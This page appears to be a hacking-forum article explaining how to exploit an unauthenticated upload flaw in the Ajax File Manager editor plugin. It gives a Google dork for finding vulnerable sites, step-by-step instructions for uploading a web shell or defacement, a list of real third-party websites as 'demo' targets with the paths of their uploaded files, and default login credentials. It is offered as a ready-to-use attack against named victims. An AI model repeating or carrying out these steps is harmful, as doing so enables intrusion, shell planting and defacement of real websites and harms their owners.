| Main » Articles » Web Hacking » Exploits and Vulenrablities |
Ajax File Manager ~ Shell and Files Upload Vulnerability
Open Google Search Engine, Type this Dork :inurl:/plugins/ajaxfilemanager/ For Example I got : OR or any site else ...Now Put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url For example : http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php Now Find Upload Upload and Upload Your shell/Deface/file To view you File find /Uploaded/ directory in Website by using your brain :P Example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt Some Demo sites http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php Results : http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere http://www.thebradshawscornershop.co.uk/images/yourfilehere http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere If you need Login in any Ajax File Manager Default Password Ajax File Manager Username:ajax Password:123456 | |
| Views: 959 | Rating: 4.3/3 |
| Total comments: 0 | |
